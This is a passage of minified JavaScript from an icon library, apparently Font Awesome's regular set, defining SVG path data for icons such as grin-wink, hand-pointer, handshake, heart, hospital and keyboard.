177.3zM168 176c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zm160 0c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32z"]},faGrinTongueSquint:{prefix:"far",iconName:"grin-tongue-squint",icon:[496,512,[],"f58a","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm64 400c0 35.6-29.1 64.5-64.9 64-35.1-.5-63.1-29.8-63.1-65v-42.8l17.7-8.8c15-7.5 31.5 1.7 34.9 16.5l2.8 12.1c2.1 9.2 15.2 9.2 17.3 0l2.8-12.1c3.4-14.8 19.8-24.1 34.9-16.5l17.7 8.8V408zm28.2 25.3c2.2-8.1 3.8-16.5 3.8-25.3v-43.5c14.2-12.4 24.4-27.5 27.3-44.5 1.7-9.9-7.7-18.5-17.7-15.3-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.9-3.1-19.4 5.3-17.7 15.3 2.9 17 13.1 32.1 27.3 44.5V408c0 8.8 1.6 17.2 3.8 25.3C91.8 399.9 48 333 48 256c0-110.3 89.7-200 200-200s200 89.7 200 200c0 77-43.8 143.9-107.8 177.3zm36.9-281.1c-3.8-4.4-10.3-5.5-15.3-2.5l-80 48c-3.6 2.2-5.8 6.1-5.8 10.3s2.2 8.1 5.8 10.3l80 48c5.4 3.2 11.7 1.7 15.3-2.5 3.8-4.5 3.8-11 .1-15.5L343.6 208l33.6-40.3c3.8-4.5 3.7-11.1-.1-15.5zm-162.9 45.5l-80-48c-5-3-11.4-2-15.3 2.5-3.8 4.5-3.8 11-.1 15.5l33.6 40.3-33.6 40.3c-3.8 4.5-3.7 11 .1 15.5 3.6 4.2 9.9 5.7 15.3 2.5l80-48c3.6-2.2 5.8-6.1 5.8-10.3s-2.2-8.1-5.8-10.3z"]},faGrinTongueWink:{prefix:"far",iconName:"grin-tongue-wink",icon:[496,512,[],"f58b","M152 180c-25.7 0-55.9 16.9-59.8 42.1-.8 5 1.7 10 6.1 12.4 4.4 2.4 9.9 1.8 13.7-1.6l9.5-8.5c14.8-13.2 46.2-13.2 61 0l9.5 8.5c2.5 2.2 8 4.7 13.7 1.6 4.4-2.4 6.9-7.4 6.1-12.4-3.9-25.2-34.1-42.1-59.8-42.1zm176-52c-44.2 0-80 35.8-80 80s35.8 80 80 80 80-35.8 80-80-35.8-80-80-80zm0 128c-26.5 0-48-21.5-48-48s21.5-48 48-48 48 21.5 48 48-21.5 48-48 48zm0-72c-13.3 0-24 10.7-24 24s10.7 24 24 24 24-10.7 24-24-10.7-24-24-24zM248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm64 400c0 35.6-29.1 64.5-64.9 64-35.1-.5-63.1-29.8-63.1-65v-42.8l17.7-8.8c15-7.5 31.5 1.7 34.9 16.5l2.8 12.1c2.1 9.2 15.2 9.2 17.3 0l2.8-12.1c3.4-14.8 19.8-24.1 34.9-16.5l17.7 8.8V408zm28.2 25.3c2.2-8.1 3.8-16.5 3.8-25.3v-43.5c14.2-12.4 24.4-27.5 27.3-44.5 1.7-9.9-7.7-18.5-17.7-15.3-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.9-3.1-19.4 5.3-17.7 15.3 2.9 17 13.1 32.1 27.3 44.5V408c0 8.8 1.6 17.2 3.8 25.3C91.8 399.9 48 333 48 256c0-110.3 89.7-200 200-200s200 89.7 200 200c0 77-43.8 143.9-107.8 177.3z"]},faGrinWink:{prefix:"far",iconName:"grin-wink",icon:[496,512,[],"f58c","M328 180c-25.69 0-55.88 16.92-59.86 42.12-1.75 11.22 11.5 18.24 19.83 10.84l9.55-8.48c14.81-13.19 46.16-13.19 60.97 0l9.55 8.48c8.48 7.43 21.56.25 19.83-10.84C383.88 196.92 353.69 180 328 180zm-160 60c17.67 0 32-14.33 32-32s-14.33-32-32-32-32 14.33-32 32 14.33 32 32 32zm185.55 64.64c-25.93 8.3-64.4 13.06-105.55 13.06s-79.62-4.75-105.55-13.06c-9.94-3.13-19.4 5.37-17.71 15.34C132.67 367.13 196.06 400 248 400s115.33-32.87 123.26-80.02c1.68-9.89-7.67-18.48-17.71-15.34zM248 8C111.03 8 0 119.03 0 256s111.03 248 248 248 248-111.03 248-248S384.97 8 248 8zm0 448c-110.28 0-200-89.72-200-200S137.72 56 248 56s200 89.72 200 200-89.72 200-200 200z"]},faHandLizard:{prefix:"far",iconName:"hand-lizard",icon:[576,512,[],"f258","M556.686 290.542L410.328 64.829C397.001 44.272 374.417 32 349.917 32H56C25.121 32 0 57.122 0 88v8c0 44.112 35.888 80 80 80h196.042l-18.333 48H144c-48.523 0-88 39.477-88 88 0 30.879 25.121 56 56 56h131.552c2.987 0 5.914.549 8.697 1.631L352 408.418V480h224V355.829c0-23.225-6.679-45.801-19.314-65.287zM528 432H400v-23.582c0-19.948-12.014-37.508-30.604-44.736l-99.751-38.788A71.733 71.733 0 0 0 243.552 320H112c-4.411 0-8-3.589-8-8 0-22.056 17.944-40 40-40h113.709c19.767 0 37.786-12.407 44.84-30.873l24.552-64.281c8.996-23.553-8.428-48.846-33.63-48.846H80c-17.645 0-32-14.355-32-32v-8c0-4.411 3.589-8 8-8h293.917c8.166 0 15.693 4.09 20.137 10.942l146.358 225.715A71.84 71.84 0 0 1 528 355.829V432z"]},faHandPaper:{prefix:"far",iconName:"hand-paper",icon:[448,512,[],"f256","M372.57 112.641v-10.825c0-43.612-40.52-76.691-83.039-65.546-25.629-49.5-94.09-47.45-117.982.747C130.269 26.456 89.144 57.945 89.144 102v126.13c-19.953-7.427-43.308-5.068-62.083 8.871-29.355 21.796-35.794 63.333-14.55 93.153L132.48 498.569a32 32 0 0 0 26.062 13.432h222.897c14.904 0 27.835-10.289 31.182-24.813l30.184-130.958A203.637 203.637 0 0 0 448 310.564V179c0-40.62-35.523-71.992-75.43-66.359zm27.427 197.922c0 11.731-1.334 23.469-3.965 34.886L368.707 464h-201.92L51.591 302.303c-14.439-20.27 15.023-42.776 29.394-22.605l27.128 38.079c8.995 12.626 29.031 6.287 29.031-9.283V102c0-25.645 36.571-24.81 36.571.691V256c0 8.837 7.163 16 16 16h6.856c8.837 0 16-7.163 16-16V67c0-25.663 36.571-24.81 36.571.691V256c0 8.837 7.163 16 16 16h6.856c8.837 0 16-7.163 16-16V101.125c0-25.672 36.57-24.81 36.57.691V256c0 8.837 7.163 16 16 16h6.857c8.837 0 16-7.163 16-16v-76.309c0-26.242 36.57-25.64 36.57-.691v131.563z"]},faHandPeace:{prefix:"far",iconName:"hand-peace",icon:[448,512,[],"f25b","M362.146 191.976c-13.71-21.649-38.761-34.016-65.006-30.341V74c0-40.804-32.811-74-73.141-74-40.33 0-73.14 33.196-73.14 74L160 168l-18.679-78.85C126.578 50.843 83.85 32.11 46.209 47.208 8.735 62.238-9.571 104.963 5.008 142.85l55.757 144.927c-30.557 24.956-43.994 57.809-24.733 92.218l54.853 97.999C102.625 498.97 124.73 512 148.575 512h205.702c30.744 0 57.558-21.44 64.555-51.797l27.427-118.999a67.801 67.801 0 0 0 1.729-15.203L448 256c0-44.956-43.263-77.343-85.854-64.024zM399.987 326c0 1.488-.169 2.977-.502 4.423l-27.427 119.001c-1.978 8.582-9.29 14.576-17.782 14.576H148.575c-6.486 0-12.542-3.621-15.805-9.449l-54.854-98c-4.557-8.141-2.619-18.668 4.508-24.488l26.647-21.764a16 16 0 0 0 4.812-18.139l-64.09-166.549C37.226 92.956 84.37 74.837 96.51 106.389l59.784 155.357A16 16 0 0 0 171.227 272h11.632c8.837 0 16-7.163 16-16V74c0-34.375 50.281-34.43 50.281 0v182c0 8.837 7.163 16 16 16h6.856c8.837 0 16-7.163 16-16v-28c0-25.122 36.567-25.159 36.567 0v28c0 8.837 7.163 16 16 16h6.856c8.837 0 16-7.163 16-16 0-25.12 36.567-25.16 36.567 0v70z"]},faHandPointDown:{prefix:"far",iconName:"hand-point-down",icon:[448,512,[],"f0a7","M188.8 512c45.616 0 83.2-37.765 83.2-83.2v-35.647a93.148 93.148 0 0 0 22.064-7.929c22.006 2.507 44.978-3.503 62.791-15.985C409.342 368.1 448 331.841 448 269.299V248c0-60.063-40-98.512-40-127.2v-2.679c4.952-5.747 8-13.536 8-22.12V32c0-17.673-12.894-32-28.8-32H156.8C140.894 0 128 14.327 128 32v64c0 8.584 3.048 16.373 8 22.12v2.679c0 6.964-6.193 14.862-23.668 30.183l-.148.129-.146.131c-9.937 8.856-20.841 18.116-33.253 25.851C48.537 195.798 0 207.486 0 252.8c0 56.928 35.286 92 83.2 92 8.026 0 15.489-.814 22.4-2.176V428.8c0 45.099 38.101 83.2 83.2 83.2zm0-48c-18.7 0-35.2-16.775-35.2-35.2V270.4c-17.325 0-35.2 26.4-70.4 26.4-26.4 0-35.2-20.625-35.2-44 0-8.794 32.712-20.445 56.1-34.926 14.575-9.074 27.225-19.524 39.875-30.799 18.374-16.109 36.633-33.836 39.596-59.075h176.752C364.087 170.79 400 202.509 400 248v21.299c0 40.524-22.197 57.124-61.325 50.601-8.001 14.612-33.979 24.151-53.625 12.925-18.225 19.365-46.381 17.787-61.05 4.95V428.8c0 18.975-16.225 35.2-35.2 35.2zM328 64c0-13.255 10.745-24 24-24s24 10.745 24 24-10.745 24-24 24-24-10.745-24-24z"]},faHandPointLeft:{prefix:"far",iconName:"hand-point-left",icon:[512,512,[],"f0a5","M0 220.8C0 266.416 37.765 304 83.2 304h35.647a93.148 93.148 0 0 0 7.929 22.064c-2.507 22.006 3.503 44.978 15.985 62.791C143.9 441.342 180.159 480 242.701 480H264c60.063 0 98.512-40 127.2-40h2.679c5.747 4.952 13.536 8 22.12 8h64c17.673 0 32-12.894 32-28.8V188.8c0-15.906-14.327-28.8-32-28.8h-64c-8.584 0-16.373 3.048-22.12 8H391.2c-6.964 0-14.862-6.193-30.183-23.668l-.129-.148-.131-.146c-8.856-9.937-18.116-20.841-25.851-33.253C316.202 80.537 304.514 32 259.2 32c-56.928 0-92 35.286-92 83.2 0 8.026.814 15.489 2.176 22.4H83.2C38.101 137.6 0 175.701 0 220.8zm48 0c0-18.7 16.775-35.2 35.2-35.2h158.4c0-17.325-26.4-35.2-26.4-70.4 0-26.4 20.625-35.2 44-35.2 8.794 0 20.445 32.712 34.926 56.1 9.074 14.575 19.524 27.225 30.799 39.875 16.109 18.374 33.836 36.633 59.075 39.596v176.752C341.21 396.087 309.491 432 264 432h-21.299c-40.524 0-57.124-22.197-50.601-61.325-14.612-8.001-24.151-33.979-12.925-53.625-19.365-18.225-17.787-46.381-4.95-61.05H83.2C64.225 256 48 239.775 48 220.8zM448 360c13.255 0 24 10.745 24 24s-10.745 24-24 24-24-10.745-24-24 10.745-24 24-24z"]},faHandPointRight:{prefix:"far",iconName:"hand-point-right",icon:[512,512,[],"f0a4","M428.8 137.6h-86.177a115.52 115.52 0 0 0 2.176-22.4c0-47.914-35.072-83.2-92-83.2-45.314 0-57.002 48.537-75.707 78.784-7.735 12.413-16.994 23.317-25.851 33.253l-.131.146-.129.148C135.662 161.807 127.764 168 120.8 168h-2.679c-5.747-4.952-13.536-8-22.12-8H32c-17.673 0-32 12.894-32 28.8v230.4C0 435.106 14.327 448 32 448h64c8.584 0 16.373-3.048 22.12-8h2.679c28.688 0 67.137 40 127.2 40h21.299c62.542 0 98.8-38.658 99.94-91.145 12.482-17.813 18.491-40.785 15.985-62.791A93.148 93.148 0 0 0 393.152 304H428.8c45.435 0 83.2-37.584 83.2-83.2 0-45.099-38.101-83.2-83.2-83.2zm0 118.4h-91.026c12.837 14.669 14.415 42.825-4.95 61.05 11.227 19.646 1.687 45.624-12.925 53.625 6.524 39.128-10.076 61.325-50.6 61.325H248c-45.491 0-77.21-35.913-120-39.676V215.571c25.239-2.964 42.966-21.222 59.075-39.596 11.275-12.65 21.725-25.3 30.799-39.875C232.355 112.712 244.006 80 252.8 80c23.375 0 44 8.8 44 35.2 0 35.2-26.4 53.075-26.4 70.4h158.4c18.425 0 35.2 16.5 35.2 35.2 0 18.975-16.225 35.2-35.2 35.2zM88 384c0 13.255-10.745 24-24 24s-24-10.745-24-24 10.745-24 24-24 24 10.745 24 24z"]},faHandPointUp:{prefix:"far",iconName:"hand-point-up",icon:[448,512,[],"f0a6","M105.6 83.2v86.177a115.52 115.52 0 0 0-22.4-2.176c-47.914 0-83.2 35.072-83.2 92 0 45.314 48.537 57.002 78.784 75.707 12.413 7.735 23.317 16.994 33.253 25.851l.146.131.148.129C129.807 376.338 136 384.236 136 391.2v2.679c-4.952 5.747-8 13.536-8 22.12v64c0 17.673 12.894 32 28.8 32h230.4c15.906 0 28.8-14.327 28.8-32v-64c0-8.584-3.048-16.373-8-22.12V391.2c0-28.688 40-67.137 40-127.2v-21.299c0-62.542-38.658-98.8-91.145-99.94-17.813-12.482-40.785-18.491-62.791-15.985A93.148 93.148 0 0 0 272 118.847V83.2C272 37.765 234.416 0 188.8 0c-45.099 0-83.2 38.101-83.2 83.2zm118.4 0v91.026c14.669-12.837 42.825-14.415 61.05 4.95 19.646-11.227 45.624-1.687 53.625 12.925 39.128-6.524 61.325 10.076 61.325 50.6V264c0 45.491-35.913 77.21-39.676 120H183.571c-2.964-25.239-21.222-42.966-39.596-59.075-12.65-11.275-25.3-21.725-39.875-30.799C80.712 279.645 48 267.994 48 259.2c0-23.375 8.8-44 35.2-44 35.2 0 53.075 26.4 70.4 26.4V83.2c0-18.425 16.5-35.2 35.2-35.2 18.975 0 35.2 16.225 35.2 35.2zM352 424c13.255 0 24 10.745 24 24s-10.745 24-24 24-24-10.745-24-24 10.745-24 24-24z"]},faHandPointer:{prefix:"far",iconName:"hand-pointer",icon:[448,512,[],"f25a","M358.182 179.361c-19.493-24.768-52.679-31.945-79.872-19.098-15.127-15.687-36.182-22.487-56.595-19.629V67c0-36.944-29.736-67-66.286-67S89.143 30.056 89.143 67v161.129c-19.909-7.41-43.272-5.094-62.083 8.872-29.355 21.795-35.793 63.333-14.55 93.152l109.699 154.001C134.632 501.59 154.741 512 176 512h178.286c30.802 0 57.574-21.5 64.557-51.797l27.429-118.999A67.873 67.873 0 0 0 448 326v-84c0-46.844-46.625-79.273-89.818-62.639zM80.985 279.697l27.126 38.079c8.995 12.626 29.031 6.287 29.031-9.283V67c0-25.12 36.571-25.16 36.571 0v175c0 8.836 7.163 16 16 16h6.857c8.837 0 16-7.164 16-16v-35c0-25.12 36.571-25.16 36.571 0v35c0 8.836 7.163 16 16 16H272c8.837 0 16-7.164 16-16v-21c0-25.12 36.571-25.16 36.571 0v21c0 8.836 7.163 16 16 16h6.857c8.837 0 16-7.164 16-16 0-25.121 36.571-25.16 36.571 0v84c0 1.488-.169 2.977-.502 4.423l-27.43 119.001c-1.978 8.582-9.29 14.576-17.782 14.576H176c-5.769 0-11.263-2.878-14.697-7.697l-109.712-154c-14.406-20.223 14.994-42.818 29.394-22.606zM176.143 400v-96c0-8.837 6.268-16 14-16h6c7.732 0 14 7.163 14 16v96c0 8.837-6.268 16-14 16h-6c-7.733 0-14-7.163-14-16zm75.428 0v-96c0-8.837 6.268-16 14-16h6c7.732 0 14 7.163 14 16v96c0 8.837-6.268 16-14 16h-6c-7.732 0-14-7.163-14-16zM327 400v-96c0-8.837 6.268-16 14-16h6c7.732 0 14 7.163 14 16v96c0 8.837-6.268 16-14 16h-6c-7.732 0-14-7.163-14-16z"]},faHandRock:{prefix:"far",iconName:"hand-rock",icon:[512,512,[],"f255","M408.864 79.052c-22.401-33.898-66.108-42.273-98.813-23.588-29.474-31.469-79.145-31.093-108.334-.022-47.16-27.02-108.71 5.055-110.671 60.806C44.846 105.407 0 140.001 0 187.429v56.953c0 32.741 14.28 63.954 39.18 85.634l97.71 85.081c4.252 3.702 3.11 5.573 3.11 32.903 0 17.673 14.327 32 32 32h252c17.673 0 32-14.327 32-32 0-23.513-1.015-30.745 3.982-42.37l42.835-99.656c6.094-14.177 9.183-29.172 9.183-44.568V146.963c0-52.839-54.314-88.662-103.136-67.911zM464 261.406a64.505 64.505 0 0 1-5.282 25.613l-42.835 99.655c-5.23 12.171-7.883 25.04-7.883 38.25V432H188v-10.286c0-16.37-7.14-31.977-19.59-42.817l-97.71-85.08C56.274 281.255 48 263.236 48 244.381v-56.953c0-33.208 52-33.537 52 .677v41.228a16 16 0 0 0 5.493 12.067l7 6.095A16 16 0 0 0 139 235.429V118.857c0-33.097 52-33.725 52 .677v26.751c0 8.836 7.164 16 16 16h7c8.836 0 16-7.164 16-16v-41.143c0-33.134 52-33.675 52 .677v40.466c0 8.836 7.163 16 16 16h7c8.837 0 16-7.164 16-16v-27.429c0-33.03 52-33.78 52 .677v26.751c0 8.836 7.163 16 16 16h7c8.837 0 16-7.164 16-16 0-33.146 52-33.613 52 .677v114.445z"]},faHandScissors:{prefix:"far",iconName:"hand-scissors",icon:[512,512,[],"f257","M256 480l70-.013c5.114 0 10.231-.583 15.203-1.729l118.999-27.427C490.56 443.835 512 417.02 512 386.277V180.575c0-23.845-13.03-45.951-34.005-57.69l-97.999-54.853c-34.409-19.261-67.263-5.824-92.218 24.733L142.85 37.008c-37.887-14.579-80.612 3.727-95.642 41.201-15.098 37.642 3.635 80.37 41.942 95.112L168 192l-94-9.141c-40.804 0-74 32.811-74 73.14 0 40.33 33.196 73.141 74 73.141h87.635c-3.675 26.245 8.692 51.297 30.341 65.006C178.657 436.737 211.044 480 256 480zm0-48.013c-25.16 0-25.12-36.567 0-36.567 8.837 0 16-7.163 16-16v-6.856c0-8.837-7.163-16-16-16h-28c-25.159 0-25.122-36.567 0-36.567h28c8.837 0 16-7.163 16-16v-6.856c0-8.837-7.163-16-16-16H74c-34.43 0-34.375-50.281 0-50.281h182c8.837 0 16-7.163 16-16v-11.632a16 16 0 0 0-10.254-14.933L106.389 128.51c-31.552-12.14-13.432-59.283 19.222-46.717l166.549 64.091a16.001 16.001 0 0 0 18.139-4.812l21.764-26.647c5.82-7.127 16.348-9.064 24.488-4.508l98 54.854c5.828 3.263 9.449 9.318 9.449 15.805v205.701c0 8.491-5.994 15.804-14.576 17.782l-119.001 27.427a19.743 19.743 0 0 1-4.423.502h-70z"]},faHandSpock:{prefix:"far",iconName:"hand-spock",icon:[512,512,[],"f259","M21.096 381.79l129.092 121.513a32 32 0 0 0 21.932 8.698h237.6c14.17 0 26.653-9.319 30.68-22.904l31.815-107.313A115.955 115.955 0 0 0 477 348.811v-36.839c0-4.051.476-8.104 1.414-12.045l31.73-133.41c10.099-42.412-22.316-82.738-65.544-82.525-4.144-24.856-22.543-47.165-49.85-53.992-35.803-8.952-72.227 12.655-81.25 48.75L296.599 184 274.924 52.01c-8.286-36.07-44.303-58.572-80.304-50.296-29.616 6.804-50.138 32.389-51.882 61.295-42.637.831-73.455 40.563-64.071 81.844l31.04 136.508c-27.194-22.515-67.284-19.992-91.482 5.722-25.376 26.961-24.098 69.325 2.871 94.707zm32.068-61.811l.002-.001c7.219-7.672 19.241-7.98 26.856-.813l53.012 49.894C143.225 378.649 160 371.4 160 357.406v-69.479c0-1.193-.134-2.383-.397-3.546l-34.13-150.172c-5.596-24.617 31.502-32.86 37.054-8.421l30.399 133.757a16 16 0 0 0 15.603 12.454h8.604c10.276 0 17.894-9.567 15.594-19.583l-41.62-181.153c-5.623-24.469 31.39-33.076 37.035-8.508l45.22 196.828A16 16 0 0 0 288.956 272h13.217a16 16 0 0 0 15.522-12.119l42.372-169.49c6.104-24.422 42.962-15.159 36.865 9.217L358.805 252.12c-2.521 10.088 5.115 19.88 15.522 19.88h9.694a16 16 0 0 0 15.565-12.295L426.509 146.6c5.821-24.448 42.797-15.687 36.966 8.802L431.72 288.81a100.094 100.094 0 0 0-2.72 23.162v36.839c0 6.548-.943 13.051-2.805 19.328L397.775 464h-219.31L53.978 346.836c-7.629-7.18-7.994-19.229-.814-26.857z"]},faHandshake:{prefix:"far",iconName:"handshake",icon:[640,512,[],"f2b5","M519.2 127.9l-47.6-47.6A56.252 56.252 0 0 0 432 64H205.2c-14.8 0-29.1 5.9-39.6 16.3L118 127.9H0v255.7h64c17.6 0 31.8-14.2 31.9-31.7h9.1l84.6 76.4c30.9 25.1 73.8 25.7 105.6 3.8 12.5 10.8 26 15.9 41.1 15.9 18.2 0 35.3-7.4 48.8-24 22.1 8.7 48.2 2.6 64-16.8l26.2-32.3c5.6-6.9 9.1-14.8 10.9-23h57.9c.1 17.5 14.4 31.7 31.9 31.7h64V127.9H519.2zM48 351.6c-8.8 0-16-7.2-16-16s7.2-16 16-16 16 7.2 16 16c0 8.9-7.2 16-16 16zm390-6.9l-26.1 32.2c-2.8 3.4-7.8 4-11.3 1.2l-23.9-19.4-30 36.5c-6 7.3-15 4.8-18 2.4l-36.8-31.5-15.6 19.2c-13.9 17.1-39.2 19.7-55.3 6.6l-97.3-88H96V175.8h41.9l61.7-61.6c2-.8 3.7-1.5 5.7-2.3H262l-38.7 35.5c-29.4 26.9-31.1 72.3-4.4 101.3 14.8 16.2 61.2 41.2 101.5 4.4l8.2-7.5 108.2 87.8c3.4 2.8 3.9 7.9 1.2 11.3zm106-40.8h-69.2c-2.3-2.8-4.9-5.4-7.7-7.7l-102.7-83.4 12.5-11.4c6.5-6 7-16.1 1-22.6L367 167.1c-6-6.5-16.1-6.9-22.6-1l-55.2 50.6c-9.5 8.7-25.7 9.4-34.6 0-9.3-9.9-8.5-25.1 1.2-33.9l65.6-60.1c7.4-6.8 17-10.5 27-10.5l83.7-.2c2.1 0 4.1.8 5.5 2.3l61.7 61.6H544v128zm48 47.7c-8.8 0-16-7.2-16-16s7.2-16 16-16 16 7.2 16 16c0 8.9-7.2 16-16 16z"]},faHdd:{prefix:"far",iconName:"hdd",icon:[576,512,[],"f0a0","M567.403 235.642L462.323 84.589A48 48 0 0 0 422.919 64H153.081a48 48 0 0 0-39.404 20.589L8.597 235.642A48.001 48.001 0 0 0 0 263.054V400c0 26.51 21.49 48 48 48h480c26.51 0 48-21.49 48-48V263.054c0-9.801-3-19.366-8.597-27.412zM153.081 112h269.838l77.913 112H75.168l77.913-112zM528 400H48V272h480v128zm-32-64c0 17.673-14.327 32-32 32s-32-14.327-32-32 14.327-32 32-32 32 14.327 32 32zm-96 0c0 17.673-14.327 32-32 32s-32-14.327-32-32 14.327-32 32-32 32 14.327 32 32z"]},faHeart:{prefix:"far",iconName:"heart",icon:[512,512,[],"f004","M458.4 64.3C400.6 15.7 311.3 23 256 79.3 200.7 23 111.4 15.6 53.6 64.3-21.6 127.6-10.6 230.8 43 285.5l175.4 178.7c10 10.2 23.4 15.9 37.6 15.9 14.3 0 27.6-5.6 37.6-15.8L469 285.6c53.5-54.7 64.7-157.9-10.6-221.3zm-23.6 187.5L259.4 430.5c-2.4 2.4-4.4 2.4-6.8 0L77.2 251.8c-36.5-37.2-43.9-107.6 7.3-150.7 38.9-32.7 98.9-27.8 136.5 10.5l35 35.7 35-35.7c37.8-38.5 97.8-43.2 136.5-10.6 51.1 43.1 43.5 113.9 7.3 150.8z"]},faHospital:{prefix:"far",iconName:"hospital",icon:[448,512,[],"f0f8","M128 244v-40c0-6.627 5.373-12 12-12h40c6.627 0 12 5.373 12 12v40c0 6.627-5.373 12-12 12h-40c-6.627 0-12-5.373-12-12zm140 12h40c6.627 0 12-5.373 12-12v-40c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v40c0 6.627 5.373 12 12 12zm-76 84v-40c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v40c0 6.627 5.373 12 12 12h40c6.627 0 12-5.373 12-12zm76 12h40c6.627 0 12-5.373 12-12v-40c0-6.627-5.373-12-12-12h-40c-6.627 0-12 5.373-12 12v40c0 6.627 5.373 12 12 12zm180 124v36H0v-36c0-6.627 5.373-12 12-12h19.5V85.035C31.5 73.418 42.245 64 55.5 64H144V24c0-13.255 10.745-24 24-24h112c13.255 0 24 10.745 24 24v40h88.5c13.255 0 24 9.418 24 21.035V464H436c6.627 0 12 5.373 12 12zM79.5 463H192v-67c0-6.627 5.373-12 12-12h40c6.627 0 12 5.373 12 12v67h112.5V112H304v24c0 13.255-10.745 24-24 24H168c-13.255 0-24-10.745-24-24v-24H79.5v351zM266 64h-26V38a6 6 0 0 0-6-6h-20a6 6 0 0 0-6 6v26h-26a6 6 0 0 0-6 6v20a6 6 0 0 0 6 6h26v26a6 6 0 0 0 6 6h20a6 6 0 0 0 6-6V96h26a6 6 0 0 0 6-6V70a6 6 0 0 0-6-6z"]},faHourglass:{prefix:"far",iconName:"hourglass",icon:[384,512,[],"f254","M368 48h4c6.627 0 12-5.373 12-12V12c0-6.627-5.373-12-12-12H12C5.373 0 0 5.373 0 12v24c0 6.627 5.373 12 12 12h4c0 80.564 32.188 165.807 97.18 208C47.899 298.381 16 383.9 16 464h-4c-6.627 0-12 5.373-12 12v24c0 6.627 5.373 12 12 12h360c6.627 0 12-5.373 12-12v-24c0-6.627-5.373-12-12-12h-4c0-80.564-32.188-165.807-97.18-208C336.102 213.619 368 128.1 368 48zM64 48h256c0 101.62-57.307 184-128 184S64 149.621 64 48zm256 416H64c0-101.62 57.308-184 128-184s128 82.38 128 184z"]},faIdBadge:{prefix:"far",iconName:"id-badge",icon:[384,512,[],"f2c1","M336 0H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h288c26.5 0 48-21.5 48-48V48c0-26.5-21.5-48-48-48zm0 464H48V48h288v416zM144 112h96c8.8 0 16-7.2 16-16s-7.2-16-16-16h-96c-8.8 0-16 7.2-16 16s7.2 16 16 16zm48 176c35.3 0 64-28.7 64-64s-28.7-64-64-64-64 28.7-64 64 28.7 64 64 64zm-89.6 128h179.2c12.4 0 22.4-8.6 22.4-19.2v-19.2c0-31.8-30.1-57.6-67.2-57.6-10.8 0-18.7 8-44.8 8-26.9 0-33.4-8-44.8-8-37.1 0-67.2 25.8-67.2 57.6v19.2c0 10.6 10 19.2 22.4 19.2z"]},faIdCard:{prefix:"far",iconName:"id-card",icon:[576,512,[],"f2c2","M528 32H48C21.5 32 0 53.5 0 80v352c0 26.5 21.5 48 48 48h480c26.5 0 48-21.5 48-48V80c0-26.5-21.5-48-48-48zm0 400H303.2c.9-4.5.8 3.6.8-22.4 0-31.8-30.1-57.6-67.2-57.6-10.8 0-18.7 8-44.8 8-26.9 0-33.4-8-44.8-8-37.1 0-67.2 25.8-67.2 57.6 0 26-.2 17.9.8 22.4H48V144h480v288zm-168-80h112c4.4 0 8-3.6 8-8v-16c0-4.4-3.6-8-8-8H360c-4.4 0-8 3.6-8 8v16c0 4.4 3.6 8 8 8zm0-64h112c4.4 0 8-3.6 8-8v-16c0-4.4-3.6-8-8-8H360c-4.4 0-8 3.6-8 8v16c0 4.4 3.6 8 8 8zm0-64h112c4.4 0 8-3.6 8-8v-16c0-4.4-3.6-8-8-8H360c-4.4 0-8 3.6-8 8v16c0 4.4 3.6 8 8 8zm-168 96c35.3 0 64-28.7 64-64s-28.7-64-64-64-64 28.7-64 64 28.7 64 64 64z"]},faImage:{prefix:"far",iconName:"image",icon:[512,512,[],"f03e","M464 64H48C21.49 64 0 85.49 0 112v288c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V112c0-26.51-21.49-48-48-48zm-6 336H54a6 6 0 0 1-6-6V118a6 6 0 0 1 6-6h404a6 6 0 0 1 6 6v276a6 6 0 0 1-6 6zM128 152c-22.091 0-40 17.909-40 40s17.909 40 40 40 40-17.909 40-40-17.909-40-40-40zM96 352h320v-80l-87.515-87.515c-4.686-4.686-12.284-4.686-16.971 0L192 304l-39.515-39.515c-4.686-4.686-12.284-4.686-16.971 0L96 304v48z"]},faImages:{prefix:"far",iconName:"images",icon:[576,512,[],"f302","M480 416v16c0 26.51-21.49 48-48 48H48c-26.51 0-48-21.49-48-48V176c0-26.51 21.49-48 48-48h16v48H54a6 6 0 0 0-6 6v244a6 6 0 0 0 6 6h372a6 6 0 0 0 6-6v-10h48zm42-336H150a6 6 0 0 0-6 6v244a6 6 0 0 0 6 6h372a6 6 0 0 0 6-6V86a6 6 0 0 0-6-6zm6-48c26.51 0 48 21.49 48 48v256c0 26.51-21.49 48-48 48H144c-26.51 0-48-21.49-48-48V80c0-26.51 21.49-48 48-48h384zM264 144c0 22.091-17.909 40-40 40s-40-17.909-40-40 17.909-40 40-40 40 17.909 40 40zm-72 96l39.515-39.515c4.686-4.686 12.284-4.686 16.971 0L288 240l103.515-103.515c4.686-4.686 12.284-4.686 16.971 0L480 208v80H192v-48z"]},faKeyboard:{prefix:"far",iconName:"keyboard",icon:[576,512,[],"f11c","M528 64H48C21.49 64 0 85.49 0 112v288c0 26.51 21.49 48 48 48h480c26.51 0 48-21.49 48-48V112c0-26.51-21.49-48-48-48zm8 336c0 4.411-3.589 8-8 8H48c-4.411 0-8-3.589-8-8V112c0-4.411 3.589-8 8-8h480c4.411 0 8 3.589 8 8v288zM170 270v-28c0-6.627-5.373-12-12-12h-28c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 12-12zm96 0v-28c0-6.627-5.373-12-12-12h-28c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 12-12zm96 0v-28c0-6.627-5.373-12-12-12h-28c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 12-12zm96 0v-28c0-6.627-5.373-12-12-12h-28c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 12-12zm-336 82v-28c0-6.627-5.373-12-12-12H82c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 